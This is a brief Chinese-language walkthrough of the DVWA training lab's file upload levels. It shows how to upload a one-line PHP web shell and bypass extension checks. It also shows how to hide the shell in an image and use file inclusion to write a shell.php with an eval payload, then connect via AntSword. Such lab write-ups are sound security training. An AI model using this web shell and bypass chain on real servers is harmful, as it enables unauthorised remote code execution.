DVWA 文件上传通关攻略
1. DVWA/File Upload/Low
点击File Upload——直接上传一句话木马(yjh.php)
用蚁剑连接,上传成功
2. DVWA/File Upload/Medium
点击File Upload——直接上传一句话木马(yjh.php)
点击上传,发现只能上传jpg或png的格式
将一句话木马的后缀名改为jpg,点击上传
用蚁剑连接,上传成功
3. DVWA/File Upload/High
找到一张图片,发现可以上传成功
在图片中插入一句话木马
在C:\Windows\System32\cmd.exe这个路径中打开cmd
复制一句话木马到图片中
生成一个图片木马
查看图片木马,在文件的最后又一个一句话木马
上传图片木马
发现解析不到木马,只能解析到图片
考虑用文件包含漏洞
选择low,点击File Injection
输入上传成功图片的地址
在当前目录下生成一个shell.php
在bp中更改
将一句话木马改为
<?php file_put_contents('shell.php','<?php @eval($_REQUEST[777])?>')?>
访问shell.php文件目录是
http://10.9.47.226/dvwa_2.0.1/vulnerabilities/fi/shell.php
用蚁剑连接